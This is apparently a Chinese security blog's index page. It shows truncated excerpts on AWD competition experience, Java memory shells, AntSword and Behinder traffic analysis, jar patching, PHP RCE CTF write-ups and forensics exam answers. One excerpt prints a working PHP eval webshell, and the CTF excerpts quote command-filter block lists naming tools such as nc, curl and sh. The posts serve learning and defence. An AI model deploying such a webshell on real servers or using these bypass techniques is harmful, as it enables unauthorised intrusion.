前言最后是第五名,只能说缺少绿盟根本不太可能进决赛,FW了,纯靠PWN✌。 吐槽说实话办的不咋地,加固没有权限,浪费了一上午时间。中午十二点半刚开靶机就放开打了。因为权限的问题,没法修改PWN和Java的题目,就没让Check这两个,但是最后事实上三个服务的没有check。而且据B神说,好像有的服务器,在两个端口开了两个服务。当时没注意,如果真是这样的话我只能呃呃了。SSH一直在被人改,但是由于也没有修和check的环节,登上了也没有权限,所以意义不大。在这里点名批评绿盟的交flagapi,cookie过期的太快了,后面都是手动交的flag。而且最后半个小时中的两轮都没有刷新flag。可能刷不刷新也没啥区别了。但是由于没有php这些的权限,就导致WAF这些都没上了,但是似乎有的队还是开起来了。而且刚Fix的阶段,就有人在一直往服务器里面写不死马,因为开了文件检测,能看到后台一直在删除。问裁判,比赛结束都没给个回应。而且打的Java,他们开的通防改的flag,举报了裁判这边也没有啥办法解决。后面Pwn还不会批量打,靠PWN一个一个ip打,一个一个交吃的保底分混过的。 Webphp除了那个 ...
Python
未读问题前几天看到关于页面的部分图片不显示,当时全部换语雀的图床时候没注意。 尝试解决后来发现没加载出来的代码都是因为加载的图的位置是背景图,也就导致不能使用之前的禁用referrer策略来绕过防盗链。比如:这里使用了css来设定背景图,或者:都是使用css来设定url内容。就导致修改插件并没有检测到img元素,没有使用替代策略。首先想到的解决方案是给元素加上禁用策略,但是后面读了文档之后发现:无论用不用css,禁用策略只对a、img、area等起作用。所以即使添加上了还是加载不出来。再然后考虑就是单独开请求访问,fetch的参数上使用禁用策略,虽然这种方式可以,但是会加重前端的压力,我现在用的这个主题,已经很笨重了,再加几个js,可能会更卡,所以这个方案也后考虑。然后就考虑换图床,但是其他的图片都直接使用的语雀的,单独为几张图片开一个付费图床不太值。有考虑放在静态文件位置,但是会加速vercel的流量消耗,而且因为cdn比较差,使用效果也不太好。因此别的方法都不行的话再考虑这个。 解决方案后面就想到用vps将图片解析并缓存,类似cdn的方式。但是突然想到可以让一些放开引用策略的网站去获取 ...
简单Spring项目开一个简单的Spring项目,设置Server URL为https://start.aliyun.com/spring.io的启动没有java8,记得修改构建模式为Maven。选择一个基础的Spring Web依赖就可以。然后为其添加一个TestController 123456789101112131415package com.natro92.springtest.demos.web;import org.springframework.stereotype.Controller;import org.springframework.web.bind.annotation.RequestMapping;import org.springframework.web.bind.annotation.ResponseBody;@Controllerpublic class TestController { @ResponseBody @RequestMapping("/") public String test() ...
前言看到某个题里面用了,但是还没学过,这里就系统地学习一下Java的内存马,这部分再重学一下基础,并且复习一下开发这部分。跟着调试一下里面的细节。其中部分内容、学习路线来自于: GitHub - W01fh4cker/LearnJavaMemshellFromZero: 【三万字原创】完全零基础从0到1掌握Java内存马 讲的真不错,推荐一下。 准备知识 Tomcat 架构原理解析到架构设计借鉴_牛客博客 Tomcat的四种容器中,Engine、Host、Context、Wrapper中关系如下。如果需要访问一个https://domain1.xx.com:8080/user/list 首先请求到Tomcat服务器,Tomcat的每个连接器都监听着不同的端口。例如HTTP连接器默认监听8080端口,AJP连接器监听8009端口。因此这里被HTTP连接器接收,而HTTP连接器是属于Service组件,而有一个Service中有一个容器组件,Service中的Engine也被选中。 Service和Engine被确定了之后,Mapper(保存着容器组件和访问路径的映射)会 ...
BlueTeam
未读前言前段时间面试了某个蓝中,问了个流量辨别,但是准备的不太好,问了两个问题就被拿下了。因此这里简单学习分析一下常见的蚁剑和冰蝎3的流量特征。后面可能会补充其他的几个。 Antsword 蚁剑测试方法antsword代理设置为yakit的miit抓包端口: shell内容1<?php class G40yQ75K { public function __construct($H8744){ @eval("/*Z#h*u@!hyP709104P*/".$H8744."/*Z#h*u@!hyP709104P*/"); }}new G40yQ75K($_REQUEST['123']);?> default模式分析正常执行命令:ls请求包 12345678POST /antsword.php HTTP/1.1Host: 192.168.111.11:9290Accept-Encoding: gzip, deflateContent-Length: 4878Content-Type: ...
前言当时打长城杯复赛的时候不会修Jar包,解压开了后面就不会弄了,导致虽然知道怎么改代码,但是后面让人一直被打扣分,正巧这几天看到了一个相关的教程,就学习一下。这里从长城杯复赛的jar文件测试(DocToolKit)。 冷补丁修改jar包-方法一准备反编译所需要的jar文件: cfr-0.152.jar 用来将class文件反编译为java文件 百度网盘 DocToolkit 密码:PASS 需要操作编译的jar文件 然后使用decompile.sh脚本,批量转换class文件: 123456789101112131415#!/bin/bash# WSL运行# 设置CFR JAR文件的路径CFR_JAR="cfr-0.152.jar"# 设置class文件的根目录CLASS_ROOT="src/main/java"# 查找所有的class文件并反编译为java文件find $CLASS_ROOT -name "*.class" | while read class_file; do # 获取class文件的目录和文件 ...
前言最后排名是58,又被爆杀了,全程被队友抬了,不出意外的话应该能进复赛。 Web 以下内容为赛后总结,并非比赛时wp。 simple_php1234567891011121314<?php ini_set('open_basedir', '/var/www/html/');error_reporting(0);if(isset($_POST['cmd'])){ $cmd = escapeshellcmd($_POST['cmd']); if (!preg_match('/ls|dir|nl|nc|cat|tail|more|flag|sh|cut|awk|strings|od|curl|ping|\*|sort|ch|zip|mod|sl|find|sed|cp|mv|ty|grep|fd|df|sudo|more|cc|tac|less|head|\.|{|}|tar|zip|gcc|uniq|vi|vim|file|xxd|base64|dat ...
前言当时打这个的时候有事没看,现在复现一下。 Please_RCE_Me123456789101112131415<?phpif($_GET['moran'] === 'flag'){ highlight_file(__FILE__); if(isset($_POST['task'])&&isset($_POST['flag'])){ $str1 = $_POST['task']; $str2 = $_POST['flag']; if(preg_match('/system|eval|assert|call|create|preg|sort|{|}|filter|exec|passthru|proc|open|echo|`| |\.|include|require|flag/i',$str1) || strlen($str2) != ...
Forensics
未读前言无了,取前60,筛重后是前108,我们排了168。前面排名还好,后面服务器取证不知道为什么跑不动。这里面有不少题都不对,这是当时打的时候的记录。 APK取证分析伏季雅的手机检材,手机中诈骗APP的包名是:[答案格式:abc.abc.abc,区分大小写][★☆☆☆☆]w2a.W2Ah5.jsgjzfx.org.cn 分析伏季雅的手机检材,手机中诈骗APP连接的服务器地址是:[答案格式:127.0.0.1][★☆☆☆☆]23.27.132.60 分析伏季雅的手机检材,手机中诈骗APP的打包ID是:[答案格式:_abc_abc.abc,区分大小写][★☆☆☆☆]__W2A__h5.jsgjzfx.org.cn 分析伏季雅的手机检材,手机中诈骗APP的主启动项是:[答案格式:abc.abc.abc,区分大小写][★☆☆☆☆] 接上题,该软件存储聊天信息的数据库文件名称是:[答案格式:abc.abc,区分大小写][★★☆☆☆] 接上题,该即时通讯软件中,团队内部沟通群中,一共有多少个用户:[答案格式:1][★★☆☆☆]6 接上题,该即时通讯应用的版本号是:[答案格式:1.1.1][★★☆☆☆ ...
Forensics
未读前言在今年的盘古石之前准备一下。 环境准备 “盘古石杯”全国电子数据取证大赛晋级赛&总决赛-检材下载、题目、答案下载地址:百度网盘 加密容器密码:usy1UN2Mmgram&^d?0E5r9myrk!cmJGr 环境解压 VeraCrypt - Free Open source disk encryption with strong security for the Paranoid 选择盘符解压: 案情简介2023年4月,公安机关接到受害人张娟报案称自己在“USDTRE”虚拟币投资理财平台被骗。据公安机关了解,受害人张娟在抖音平台推送的“物联智慧购”兼职刷单招聘平台注册了个人信息,后有一位自称是“物联智慧购”兼职招聘的工作人员容某与自己联系,双方还互加了微信好友。刚开始,受害人通过兼职刷单获得了一些利润,后容某向其推荐了“USDTRE”投资理财平台,还向其介绍了投资导师魏某,在魏某的指导下,受害人刚开始获利,大额投资后无法提现,方知被骗。公安机关接警后,立即成立专案小组,通过公安机关的侦查与分析,锁定了该诈骗团伙的业务窝点,并将容某和魏某抓获,并扣押了容某的安 ...